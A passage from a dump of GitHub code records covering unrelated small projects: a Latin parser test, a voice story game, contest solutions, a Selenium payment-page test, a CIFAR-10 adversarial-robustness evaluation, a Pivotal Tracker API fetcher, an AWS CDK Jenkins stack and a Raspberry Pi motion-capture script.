Work/randNumTest OG.py","file_name":"randNumTest OG.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18221528403","text":"from open_words.parse import Parser\n\nimport unittest\n\n\nclass VerbTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.par = Parser()\n\n def test_quaero(self):\n \"\"\"\n expected = {'word': 'quaero',\n 'defs': [{'orth': ['quaero', 'quaerere', 'quaesivi', 'quaesitus'],\n 'senses': ['search for, seek, strive for', 'obtain', 'ask, inquire, demand'],\n 'infls': [{'stem': 'quaer', 'ending': 'o', 'pos': 'verb',\n 'form': {'tense': 'present', 'voice': 'active', 'mood': 'indicative',\n 'person': 1, 'number': 'singular'}}]}]}\n \"\"\"\n result = self.par.parse(\"quaero\")\n # response syntax and basics\n self.assertEqual(len(result['defs']), 1) # there is only one definition\n self.assertTrue(len(result['defs'][0])) # defs does not contain an empty dictionary\n self.assertEqual(len(result['defs'][0]['infls']), 1) # there is only one inflection\n\n # response splitting\n infl = result['defs'][0]['infls'][0]\n self.assertEqual(infl['stem'], 'quaer')\n self.assertEqual(infl['ending'], 'o')\n self.assertEqual(infl['pos'], 'verb')\n\n # response details\n form = infl['form']\n expected_form = {'tense': 'present', 'voice': 'active', 'mood': 'indicative', 'person': 1, 'number': 'singular'}\n self.assertEqual(form, expected_form)\n","repo_name":"a11ce/open_words","sub_path":"open_words/tests/integration/Test_Verbs.py","file_name":"Test_Verbs.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"1994216421","text":"from story_node import StoryNode\nfrom player import Player\n#import ctypes\n#import time\n#lib = ctypes.CDLL('FakeInputWin')\nfrom speech_recog import *\nfrom text_to_speech import *\nfrom nltk.stem.snowball import SnowballStemmer\n\n\"\"\"This class represents a story which is built from StoryNodes\nand a Player. Given a list of nodes, with the first being the starting node\nin the story, it is able to walk between nodes. When a node is visited it\nis added as a string in the dictionary of the player. Additionally, any tokens\nthat are prerequisites for later nodes are added. For example, a box office\nnode, when visited, will add a 'ticket' to the completed dictionary in player\"\"\"\n\nstemmer = SnowballStemmer('english')\n\nclass Story(object):\n # set up player and story\n def __init__(self, a_player, the_nodes):\n self.player = a_player\n self.nodes = the_nodes\n # returns child node given by players response, s, if s is a child of the current node\n # otherwise the current node is returned because s is not a valid choice\n def getNextNode(self, current, s):\n #check if user says exactly the node's name\n for child in current.children:\n if s.lower() == child.name.lower():\n return child\n\n #checks if user says node's name in a longer sentence (node's name can be multiple words)\n stems = [] #get root of every word to compare \n for word in s.lower().split():\n stems.append(stemmer.stem(word))\n \n if \"quit\" in s:\n return None\n\n for c in current.children_stems: #for every child of current\n count = 0\n for stem in c: #for every word in current.child's name\n if stem in stems: #if the user said that word\n count += 1 #success, look for next word in name, if applicable\n #otherwise, check next child\n if count == len(c): #if the user said every word in current.child's name\n return current.children[current.children_stems.index(c)]\n return current\n \n def prereqsValid(self, player, newCurrent):\n for prereq in newCurrent.prereqs:\n if not prereq in player.completed.keys() or player.completed[prereq] == False:\n speak(\"You do not have your \" + prereq + \" yet! Choose somewhere else to go.\")\n return False\n return True\n \n # moves the player to the next node in the story based on getNextNode\n def nextNode(self, player):\n\t# sets current working node to the players present position\n current = player.location\n\t\t\n\t# automated greeting for node \n\t# TODO develop better automated 'welcome'\n #speak(\"Welcome to the \" + current.name)\n\t\t\n\t# a node can have multiple activities associated with it\n\t# each activity must be completed before moving to next node\n s = current.activity.doActivity(player)\n\t\n\t\t\n\t# prompts user to choose next node out of options\n #speak(\"You are at the \" + current.name + \". Where would you like to go now?\")\n #self.printChildren(current)\n\n\t#if activity method did not return the next node, then get user's choice\n if s == None:\n s = getInputString()\n\t# check if a valid choice has been made or if getNextNode has returned the current working node\n newCurrent = self.getNextNode(current, s)\n while (not newCurrent == None) and (newCurrent == current or (not self.prereqsValid(player, newCurrent))):\n if newCurrent == current:\n speak(\"Sorry, that confused me. Please say one of the following:\")\n for c in current.children:\n speak(c.name)\n s = getInputString()\n newCurrent = self.getNextNode(current, s)\n #once a valid choice is made set current node then return it\n\n return newCurrent\n \n \n def walk(self, player): # function to 'play' the story\n while player.location != None: # while there are still nodes to visit, visit them using nextNode\n player.location = self.nextNode(player)\n\n def printChildren(self, current):\n for index,child in enumerate(current.children):\n speak(child.name)\n\n\n","repo_name":"jacnel/LilyInteractive","sub_path":"story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70415363969","text":"from collections import defaultdict\nMOD = 1000000007\nN = int(input())\nA = list(map(int, input().split()))\n\nans = 1\nd = defaultdict(int)\nfor a in A:\n if a == 0:\n ans *= 3 - d[a]\n d[a] += 1\n continue\n ans *= d[a - 1] - d[a]\n ans %= MOD\n d[a] += 1\nprint(ans)\n","repo_name":"d6ms/kyopro","sub_path":"py/others/20191201_sumitrust2019/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28193791500","text":"# __author__ = ‘pan‘\n# -*-coding:utf-8-*-\n\nimport time\nfrom util.config.yaml.readyaml import ReadYaml\nfrom util.file.fileutil import FileUtil\nfrom src.helper.hepler_waybill import HeplerWaybill\nfrom src.helper.is_have_waybill import ISHaveWaybill\nfrom src.helper.driver_confirm_api import DriverConfirmApi\nfrom src.page.page import Page\nfrom src.page.page_waybill_departure import PageWaybillDeparture\n\n\nclass PagePaymentDeparture(Page):\n '''发车支付页面'''\n\n def get_payment_departure_waybill(self, driver='', driverConfirm='1'):\n '''获取发车支付页面的运单号'''\n try:\n payment_departure_waybillId, payment_departure_tmsBillCode = ISHaveWaybill().is_have_payment_departure_waybill(\n driver=driver, driverConfirm=driverConfirm)[:2]\n\n if payment_departure_waybillId != None:\n waybillId, tmsBillCode = str(payment_departure_waybillId[0]), str(payment_departure_tmsBillCode[0])\n return waybillId, tmsBillCode\n else:\n waybillId, tmsBillCode = PageWaybillDeparture(self.driver).get_wait_departure_waybill(driver=driver)\n PageWaybillDeparture(self.driver).departure_confirm(tmsBillCode=tmsBillCode)\n if driverConfirm == '1':\n # 司机发车确认\n DriverConfirmApi().driver_confirm_api(billId=waybillId, totalAmt='1000', preAmt='0.01', oilAmt='0.01',\n destAmt='0.01', lastAmt='0.01', receiverId='')\n return waybillId, tmsBillCode\n except Exception as e:\n self.logger.error('获取发车支付页面的运单号:{0}'.format(e))\n return None, None\n finally:\n # 打开运费支付模块\n HeplerWaybill().open_menu(self.driver,'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/label/a')\n\n def payment_KEKING_TO_comment(self,tmsBillCode='',payMethod=''):\n '''发车支付页面 选择除余额支付以外支付方式支付'''\n try:\n # 打开发车支付页面\n HeplerWaybill().open_menu(self.driver, 'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/div/ul/li[2]/a/span')\n # 输入运单号查询运单\n HeplerWaybill().fuzzy_query(self.driver, 'id->globalCondition', 'id->globalConditionButton', tmsBillCode)\n self.driver.element_is_not_visible('class->loading-bar-background')\n # 选择运单\n self.driver.click('id->TMS-selectCheckbox-')\n # 点击支付按钮,打开支付弹窗\n self.driver.click('id->TMS-toWayBillPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # 选择除余额支付以外支付方式\n self.driver.click('{0}'.format(payMethod))\n # 确认支付\n self.driver.click('id->TMS-toPursePay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n except Exception as e:\n self.logger.error('发车支付页面 选择除余额支付以外支付方式支付:{0}'.format(e))\n return None\n\n def singlePay_KEKING_TO_COMPANY(self,tmsBillCode=''):\n '''发车支付页面 单条运单选择贷款付商户支付'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[2]/span/label')\n except Exception as e:\n self.logger.error('发车支付页面 选择贷款付商户支付发生异常:{0}'.format(e))\n return None\n\n def singlePay_KEKING_TO_DRIVER(self,tmsBillCode=''):\n '''发车支付页面 单条运单选择白条付司机支付'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[3]/span/label')\n except Exception as e:\n self.logger.error('发车支付页面 单条运单选择白条付司机支付发生异常:{0}'.format(e))\n return None\n\n def singlePay_OFFLINE(self,tmsBillCode=''):\n '''发车支付页面 单条运单选择线下支付支付'''\n try:\n self.payment_KEKING_TO_comment(tmsBillCode=tmsBillCode,payMethod='xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[5]/span/label')\n except Exception as e:\n self.logger.error('发车支付页面 单条运单选择白条付司机支付发生异常:{0}'.format(e))\n return None\n\n def singlePay_WALLET_TO_DRIVER(self,tmsBillCode=''):\n '''发车支付页面 选择除余额支付方式支付'''\n try:\n # 打开发车支付页面\n HeplerWaybill().open_menu(self.driver, 'xpath->//*[@id=\"menu\"]/div/nav/ul/li[5]/div/ul/li[2]/a/span')\n # 输入运单号查询运单\n HeplerWaybill().fuzzy_query(self.driver, 'id->globalCondition', 'id->globalConditionButton', tmsBillCode)\n # 选择运单\n self.driver.click('id->TMS-selectCheckbox-')\n # 点击支付按钮,打开支付弹窗\n self.driver.click('id->TMS-toWayBillPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # 选择余额支付\n self.driver.click('xpath->//*[@id=\"wayBillPay\"]/div/div/div[2]/div/form/div[2]/div[2]/table/tbody/tr[2]/td[4]/span/label')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # 确认支付\n self.driver.click('id->TMS-toPursePay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n # 输入支付密码并确认支付\n self.config = ReadYaml(FileUtil.getProjectObsPath() + '/config/config.yaml').getValue()\n self.driver.type('id->sendcreate',self.config['payPassword'])\n self.driver.click('id->TMS-lianLianPay-')\n self.driver.element_is_not_visible('class->loading-bar-background')\n except Exception as e:\n self.logger.error('发车支付页面 选择除余额支付方式支付:{0}'.format(e))\n return None\n\n def create_waybill_confirm(self):\n '''支付记录 确认按钮 '''\n self.driver.click('xpath->//*[@id=\"promptInfo\"]/div/div/div[3]/button')\n self.driver.element_is_not_visible('class->loading-bar-background')\n\n def payment_waybill_success(self):\n '''支付成功'''\n self.driver.element_is_not_visible('class->loading-bar-background')\n return self.driver.get_text('xpath->//*[@id=\"promptInfo\"]/div/div/div[2]/div[1]/div[2]/table/tbody/tr[1]/td[7]')","repo_name":"penny1205/UI_testing","sub_path":"src/page/page_payment_departure.py","file_name":"page_payment_departure.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35064869289","text":"\"\"\"\nyou have two numbers represented by a linked list, where each node contains a single digit. \nThe digits are stored in reverse order, such that the 1's digit is at the head of the list. \nWrite a function that adds the two numbers and returns the sum as a linked list.\n\nEXAMPLE\nInput : (7 ->1 -> 6) + (5 -> 9 -> 2). That is 617 + 295\noutput : 2 -> 1 -> 9. That is 912\n\nFollow up:\nSuppose the digits are stored in forward order. Repeat the above problem.\nEXAMPLE\nInput : (6 -> 1 -> 7) + (2 -> 9 -> 5). That is 617 + 295\noutput : 9 -> 1 -> 2. That is 912\n\"\"\"\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution:\n\n def sumList(self, head1, head2):\n\n # Solution for the follow up\n\n head1 = self.reverseList(head1) # reversing the given linkedlist\n head2 = self.reverseList(head2) # reversing the given linkedlist\n\n # summation operation\n ans = Node(0)\n dummy = ans\n carry = 0\n\n while head1 and head2:\n\n total = head1.val + head2.val + carry\n\n val = total % 10 # for binary number total % 2\n carry = total // 10 # for binary number total // 2\n\n ans.next = Node(val)\n\n head1 = head1.next\n head2 = head2.next\n ans = ans.next\n\n while head1:\n total = head1.val + carry\n\n val = total % 10\n carry = total // 10\n\n if not carry:\n ans.next = head1\n break\n\n ans.next = Node(val)\n head1 = head1.next\n\n while head2:\n total = head2.val + carry\n val = total % 10\n carry = total // 10\n\n if not carry:\n ans.next = head2\n break\n\n ans.next = Node(val)\n head2 = head2.next\n\n if carry:\n ans.next = Node(carry)\n carry -= 1\n\n return self.reverseList(dummy)\n\n def reverseList(self, head): # reverse a linkedlist\n prev = None\n\n while head:\n temp = head.next\n head.next = prev\n\n prev = head\n\n head = temp\n\n return prev\n\n\n\"\"\"\ncan you solve the same problem using binary numbers?\n\ninput: (1-> 0 -> 1 -> 0) + (1 -> 1 -> 1 -> 1). That is 1010 + 1111\noutput: 1 -> 1 -> 0 -> 0 -> 1 . That is 11001\n\"\"\"\n","repo_name":"Sen2k9/Algorithm-and-Problem-Solving","sub_path":"CTCI/2.5_sum_lists.py","file_name":"2.5_sum_lists.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"40025156664","text":"\"\"\"\nInfinite evaluation loop going through the checkpoints in the model directory\nas they appear and evaluating them. Accuracy and average loss are printed and\nadded as tensorboard summaries.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport json\nimport math\nimport os\nimport sys\nimport time\nimport numpy as np\n\nimport tensorflow as tf\n\nimport cifar10_input\nfrom model_cifar import Model\n#from pgd_attack import LinfPGDAttack\nfrom pgd_multiGPU import *\n\n# Global constants\nwith open('config.json') as config_file:\n config = json.load(config_file)\nnum_eval_examples = config['num_eval_examples']\neval_batch_size = config['eval_batch_size']\neval_on_cpu = config['eval_on_cpu']\ndata_path = config['data_path']\n\nmodel_dir = config['model_dir']\n\n# Set upd the data, hyperparameters, and the model\ncifar = cifar10_input.CIFAR10Data(data_path)\n\nmodel = Model(config, mode='eval')\n\nglobal_step = tf.contrib.framework.get_or_create_global_step()\n\n# Setting up the Tensorboard and checkpoint outputs\nif not os.path.exists(model_dir):\n os.makedirs(model_dir)\neval_dir = os.path.join(model_dir, 'eval')\nif not os.path.exists(eval_dir):\n os.makedirs(eval_dir)\n\nalready_seen_state = False\n\nsaver = tf.train.Saver()\nsummary_writer = tf.summary.FileWriter(eval_dir)\n\ncheck_dict = {\n'nat_img': [],\n'adv_img': [],\n'nat_pred': [],\n'adv_pred': [],\n'nat_preds': [],\n'adv_preds': [],\n'label': [],\n'ckeck_idx': []\n}\n\n# A function for evaluating a single checkpoint\ndef evaluate_checkpoint(filename):\n FLAGS = tf.app.flags.FLAGS\n tfconfig = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=True,\n )\n tfconfig.gpu_options.allow_growth = True\n with tf.Session() as sess:#config=tfconfig\n\n # Restore the checkpoint\n saver.restore(sess, filename)\n\n # Iterate over the samples batch-by-batch\n num_batches = int(math.ceil(num_eval_examples / eval_batch_size))\n total_xent_nat = 0.\n total_xent_adv = 0.\n total_corr_nat = 0\n total_corr_adv = 0\n\n for ibatch in range(num_batches):\n bstart = ibatch * eval_batch_size\n bend = min(bstart + eval_batch_size, num_eval_examples)\n\n x_batch = cifar.eval_data.xs[bstart:bend, :]\n x_batch = np.asarray(x_batch, 'float32') / 255.\n y_batch = cifar.eval_data.ys[bstart:bend]\n\n dict_nat = {model.x_input: x_batch,\n model.y_input: y_batch}\n\n #x_batch_adv = attack.perturb(x_batch, y_batch, sess)\n x_batch_adv = get_PGD(sess, model.adv_grad, dict_nat, model.x_input, epsilon=8. / 255, a=0.2 / 255, k=70)\n\n dict_adv = {model.x_input: x_batch_adv,\n model.y_input: y_batch}\n\n nat_prediction, nat_voted_pred, acc_i, cur_xent_nat = sess.run(\n [model.prediction, model.voted_pred, model.accuracy,model.mean_xent],\n feed_dict = dict_nat)\n cur_corr_nat = acc_i*config['eval_batch_size']\n adv_prediction, adv_voted_pred, acc_i, cur_xent_adv = sess.run(\n [model.prediction, model.voted_pred, model.accuracy,model.mean_xent],\n feed_dict = dict_adv)\n cur_corr_adv = acc_i*config['eval_batch_size']\n print(eval_batch_size)\n print(\"Correctly classified natural examples: {}\".format(cur_corr_nat))\n print(\"Correctly classified adversarial examples: {}\".format(cur_corr_adv))\n total_xent_nat += cur_xent_nat\n total_xent_adv += cur_xent_adv\n total_corr_nat += cur_corr_nat\n total_corr_adv += cur_corr_adv\n\n check_idx = ~ np.equal(nat_voted_pred, y_batch) * np.equal(adv_voted_pred, y_batch)\n check_dict['nat_img'] += [x_batch[check_idx]]\n check_dict['adv_img'] += [x_batch_adv[check_idx]]\n check_dict['nat_pred'] += [nat_voted_pred[check_idx]]\n check_dict['adv_pred'] += [adv_voted_pred[check_idx]]\n check_dict['nat_preds'] += [nat_prediction[check_idx]]\n check_dict['adv_preds'] += [adv_prediction[check_idx]]\n check_dict['label'] += [y_batch[check_idx]]\n check_dict['ckeck_idx'] += [check_idx]\n\n check_dict['nat_img'] = np.concatenate(check_dict['nat_img'], 0)\n check_dict['adv_img'] = np.concatenate(check_dict['adv_img'], 0)\n check_dict['nat_pred'] = np.concatenate(check_dict['nat_pred'], 0)\n check_dict['adv_pred'] = np.concatenate(check_dict['adv_pred'], 0)\n check_dict['nat_preds'] = np.concatenate(check_dict['nat_preds'], 0)\n check_dict['adv_preds'] = np.concatenate(check_dict['adv_preds'], 0)\n check_dict['label'] = np.concatenate(check_dict['label'], 0)\n check_dict['ckeck_idx'] = np.concatenate(check_dict['ckeck_idx'], 0)\n\n if 1:\n import matplotlib.pyplot as plt\n jj = 20\n plt.figure(figsize=(8.8, 2))\n for idx in range(10):\n plt.subplot(2, 10, idx + 1)\n plt.imshow(check_dict['nat_img'][jj + idx])\n plt.title('{}'.format(check_dict['nat_preds'][jj + idx]))\n plt.axis('off')\n plt.subplot(2, 10, idx + 1 + 10)\n plt.imshow(check_dict['adv_img'][jj + idx])\n plt.title('{}'.format(check_dict['adv_preds'][jj + idx]))\n plt.axis('off')\n\n avg_xent_nat = total_xent_nat / num_eval_examples\n avg_xent_adv = total_xent_adv / num_eval_examples\n acc_nat = total_corr_nat / num_eval_examples\n acc_adv = total_corr_adv / num_eval_examples\n\n summary = tf.Summary(value=[\n tf.Summary.Value(tag='xent adv eval', simple_value= avg_xent_adv),\n tf.Summary.Value(tag='xent adv', simple_value= avg_xent_adv),\n tf.Summary.Value(tag='xent nat', simple_value= avg_xent_nat),\n tf.Summary.Value(tag='accuracy adv eval', simple_value= acc_adv),\n tf.Summary.Value(tag='accuracy adv', simple_value= acc_adv),\n tf.Summary.Value(tag='accuracy nat', simple_value= acc_nat)])\n summary_writer.add_summary(summary, global_step.eval(sess))\n\n print('natural: {:.2f}%'.format(100 * acc_nat))\n print('adversarial: {:.2f}%'.format(100 * acc_adv))\n print('avg nat loss: {:.4f}'.format(avg_xent_nat))\n print('avg adv loss: {:.4f}'.format(avg_xent_adv))\n\nif __name__ == '__main__':\n evaluate_checkpoint('/home/hope-yao/Documents/adversarial_defense/cifar/ckpt/crop_4_20_adv/half_half/lr_config1_adv/checkpoint-25001')","repo_name":"DesignInformaticsLab/adversarial_defense","sub_path":"cifar/script/check_cifar.py","file_name":"check_cifar.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29359610630","text":"from __future__ import print_function\nimport requests\nimport os\nimport sys\nimport pandas as pd\n\nAPI_KEY = os.getenv('TRACKER_API_KEY')\nPROJECT_ID = sys.argv[1]\nAPI = \"https://www.pivotaltracker.com/services/v5/projects/{project_id}/iterations\".format(project_id=PROJECT_ID)\n\ndef get_chunk(offset):\n r = requests.get(API,\n headers={'X-TrackerToken' : API_KEY},\n params=dict(\n limit = 100,\n offset = offset,\n fields = 'number,length,team_strength,velocity,analytics,points,effective_points,accepted,story_ids'\n ))\n return r.json()\n\ndef fetch_all():\n results = []\n i = 0\n\n while True:\n print('Grabbing chunk %d' % i)\n chunk = get_chunk(i)\n if i == 0:\n print(chunk)\n\n if len(chunk) == 0:\n break\n results.extend(chunk)\n\n i+=len(chunk)\n\n df = pd.DataFrame(results)\n df.to_csv('tracker-{}-iterations.csv'.format(PROJECT_ID), index=False, encoding='utf-8')\n\nif __name__ == '__main__':\n fetch_all()\n","repo_name":"samzhang111/velocity-prediction","sub_path":"grab_iterations.py","file_name":"grab_iterations.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8162125372","text":"class AliceGameEasy():\n def findMinimumValue(self, x, y):\n total = x + y\n turns = 0\n while turns*(turns+1)//2 < total: turns += 1\n \n if turns*(turns+1)//2 > total: return -1\n \n high = 0\n low = 0\n\n for i in range(turns+1):\n if low <= x <= high: return i\n low += i + 1\n high += turns - i\n\n return -1","repo_name":"ygretharekar/srm","sub_path":"SRM 639/alice_game_easy.py","file_name":"alice_game_easy.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20259891963","text":"n=int(input())\na=list(map(int,input().split()))\nli=list(input())\n\nfor i in range(len(a)):\n if li[i]==\"1\":\n for j in range(i+1,len(a)):\n if j None:\n super().__init__(scope, construct_id, **kwargs)\n\n networking = NetworkStack(self, \"NetworkStack\", )\n\n storage = StorageStack(self, \"StorageStack\",\n jenkins_home=jenkins_home,\n vpc=networking.vpc,\n )\n\n ServiceStack(self, \"ServiceStack\",\n jenkins_home=jenkins_home,\n app_name=app_name,\n vpc=networking.vpc,\n file_system=storage.file_system,\n access_point=storage.access_point,\n timeout=Duration.minutes(10),\n )\n","repo_name":"FarrOut/JenkinsCDK","sub_path":"jenkins/jenkins_stack.py","file_name":"jenkins_stack.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35557607235","text":"from typing import List\n\n\ndef dfs(arr, index: int, max_len: list, lis_set: set):\n if index>= len(arr):\n return\n word = set(arr[index])\n if len(word) != len(arr[index]) or len(word.intersection(lis_set)) != 0:\n dfs(arr, index + 1, max_len, lis_set)\n else:\n for w in word:\n lis_set.add(w)\n if max_len[0] < len(lis_set):\n max_len[0] = len(lis_set)\n dfs(arr, index + 1, max_len, lis_set)\n for w in word:\n lis_set.remove(w)\n dfs(arr, index + 1, max_len, lis_set)\n\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n max_len = [0]\n lis_set = set()\n dfs(arr, 0, max_len, lis_set)\n return max_len[0]\n\n\nif __name__ == '__main__':\n arr = [\"cha\", \"r\", \"act\", \"ers\"]\n print(Solution().maxLength(arr))\n","repo_name":"CAM1113/leetcode","sub_path":"dfs/main1239.py","file_name":"main1239.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3893211128","text":"import cv2\nimport numpy\nimport picamera\n\nimport sys, os\nimport pathlib\nimport datetime\nimport io\nimport json\nimport shutil\nimport time\nimport traceback\n\nfrom scripts.config import ConfigManager\nfrom scripts.log import LogManager\n\nlogManager = LogManager('/home/pi/temp/sentry/log')\nlog = logManager.log\n\nlastRequestProcessingTime = None\n\ndef processArguments():\n\tburst = False\n\tcontinuous = False\n\trapid = False\n\tupdateBase = False\n\n\tfor idx, arg in enumerate(sys.argv):\n\t\tif arg == 'cont':\n\t\t\tcontinuous = True\n\t\telif arg == 'rapid':\n\t\t\trapid = True\n\t\telif arg == 'base':\n\t\t\tupdateBase = True\n\t\telif arg == 'burst':\n\t\t\tburst = True\n\n\treturn {\n\t\t'burst': burst,\n\t\t'continuous': continuous,\n\t\t'rapid': rapid,\n\t\t'updateBase': updateBase,\n\t}\n\ndef imgsum(img, config):\n\tdecimationX = config['decimationX']\n\tdecimationY = config['decimationY']\n\n\tsum = 0\n\tfor i in range(len(img)):\n\t\tif int(i % decimationY) == 0:\n\t\t\tfor j in range(len(img[i])):\n\t\t\t\tif int(j % decimationX) == 0:\n\t\t\t\t\tfor k in range(0, 3):\n\t\t\t\t\t\tsum += img[i][j][k]\n\t\t\t\t\t\t\n\treturn sum\n\ndef benchmark(func, desc = None, configManager = None):\n\tlog = configManager.log\n\n\tt1 = datetime.datetime.utcnow()\n\tfunc()\t\n\tt2 = datetime.datetime.utcnow()\n\n\tout = f\"Total time: {t2 - t1}\"\n\tif desc:\n\t\tout += f\" ({desc})\"\n\n\tlog(out)\n\ndef currentTimeFileName():\n\treturn datetime.datetime.utcnow().strftime('%Y-%m-%dZ%H-%M-%S-%f.jpg')\n\ndef snapshots(pathSnapshots, camera, continuous = False, name = \"temp\", arguments = {}, configuration = {}, configManager = None):\n\tlog = configManager.log\n\n\tburst = arguments['burst']\n\tcontinuous = arguments['continuous']\n\trapid = arguments['rapid']\n\n\toutSize = (configuration['outputWidth'], configuration['outputHeight'])\n\tpathBaseImage = configuration['pathBaseImage']\n\tpathSnapshots = configuration['pathSnapshots']\n\tquality = configuration['quality']\n\ttolerance = configuration['tolerance']\n\n\tbaseSum = configManager.get(['baseSum'])\n\n\tstream = io.BytesIO()\n\n\tfor frame in camera.capture_continuous(stream, format='jpeg', resize = outSize, quality = quality, use_video_port = rapid, burst = burst):\n\t\tif configuration['isPaused']:\n\t\t\tstreambytes = None\n\t\t\tframe.seek(0)\n\t\t\tframe.truncate() # avoid memory 'leak'\n\t\telse:\n\t\t\tframe.seek(0)\n\t\t\tstreambytes = frame.read()\n\t\t\tframe.seek(0)\n\n\t\t\tbytes = numpy.asarray(bytearray(streambytes), numpy.uint8)\n\t\t\timg = cv2.imdecode(bytes, cv2.IMREAD_COLOR)\n\t\t\tsum = imgsum(img, configuration)\n\t\t\t\n\t\t\tdiff = abs(baseSum - sum)\n\t\t\tpercent = diff / baseSum\n\t\t\tsave = percent > tolerance\n\t\t\t\n\t\t\tlog(f\"baseSum {baseSum}, sum {sum}, percent {percent}, tolerance {tolerance}, save {save}\")\n\n\t\t\tframe.truncate()\t\t\n\t\t\t\n\t\t\tif not continuous or save:\n\t\t\t\tif name == \"temp\":\n\t\t\t\t\tfinal = f\"{pathSnapshots}/{currentTimeFileName()}\"\n\t\t\t\telse:\n\t\t\t\t\tfinal = pathBaseImage\n\t\t\t\t\n\t\t\t\twith open(final, 'wb') as f:\n\t\t\t\t\tf.write(streambytes)\n\t\t\t\t\n\t\t\t\tlog(f\"Saved snapshot {final!r} with a difference of {percent}\")\n\t\t\t\t\n\t\t\t\tif not save:\n\t\t\t\t\tbreak\n\t\t\n\t\tconfiguration = configManager.process(streambytes)\n\t\tif configuration['requests']['reinitialize']:\n\t\t\tbreak\n\n\treturn {\n\t\t'lastSum': sum\n\t}\n\t\t\t\t\ndef main(dirRoot = '/home/pi/temp/sentry', skipSleep = False, overrides = {}):\n\tlogManager = LogManager(dirRoot)\n\tlog = logManager.log\n\n\tlog(\"==========\tStarting up\t==========\")\n\n\tconfigManager = ConfigManager(dirRoot, logManager, overrides = overrides)\n\n\tconfiguration = {}\n\targuments = {}\n\n\tconfiguration = configManager.process()\n\n\tpathBaseImage = configuration['pathBaseImage']\n\tpathSnapshots = configuration['pathSnapshots']\n\n\tif (not os.path.isdir(pathSnapshots)):\n\t\tpathlib.Path(pathSnapshots).mkdir(parents = True, exist_ok = True)\n\t\tlog(f\"Created '{pathSnapshots}'\")\n\n\tbaseImageMissing = False\n\tif (not os.path.isfile(pathBaseImage)):\n\t\tbaseImageMissing = True\n\n\targuments = processArguments()\n\n\treinitialize = True\n\n\twhile reinitialize:\n\t\treinitialize = configManager.set(['requests', 'reinitialize', False])\n\n\t\tlog(\"Initializing camera...\")\n\n\t\twith picamera.PiCamera() as camera:\n\t\t\tlog(\"Camera initalized\")\n\n\t\t\ttry:\n\t\t\t\tcameraSettings = configManager.get(['cameraSettings'])\n\t\t\t\tlog(f\"Initializing camera settings from {cameraSettings}\")\n\n\t\t\t\tawbMode = cameraSettings['awbMode']\n\t\t\t\tcrop = cameraSettings['crop']\n\t\t\t\texposureMode = cameraSettings['exposureMode']\n\t\t\t\tframerate = cameraSettings['framerate']\n\t\t\t\tiso = cameraSettings['iso']\n\t\t\t\tres = cameraSettings['res']\n\t\t\t\trotation = cameraSettings['rotation']\n\t\t\t\tshutterSpeed = cameraSettings['shutterSpeed']\n\n\t\t\t\tcamera.resolution = res\n\t\t\t\tcamera.rotation = rotation\n\t\t\t\tcamera.crop = crop\n\t\t\t\tcamera.framerate = framerate\n\t\t\t\tcamera.iso = iso\n\n\t\t\t\tif not skipSleep:\n\t\t\t\t\tlog(\"Sleeping 2 seconds\")\n\t\t\t\t\ttime.sleep(2)\n\n\t\t\t\tcamera.shutter_speed = shutterSpeed\n\t\t\t\tcamera.exposure_mode = exposureMode\n\t\t\t\tg = camera.awb_gains\n\t\t\t\tcamera.awb_mode = awbMode\n\t\t\t\tcamera.awb_gains = g\n\n\t\t\t\tcamera.start_preview()\n\n\t\t\t\tlog(\"Started camera preview\")\n\n\t\t\t\tif (baseImageMissing):\n\t\t\t\t\tlog(\"Base image missing\")\n\t\t\t\t\tres = snapshots(pathSnapshots, camera, name = \"base\", arguments = arguments, configuration = configuration, configManager = configManager)\n\t\t\t\t\tlastSum = int(res['lastSum'])\n\t\t\t\t\tconfigManager.set(['baseSum', 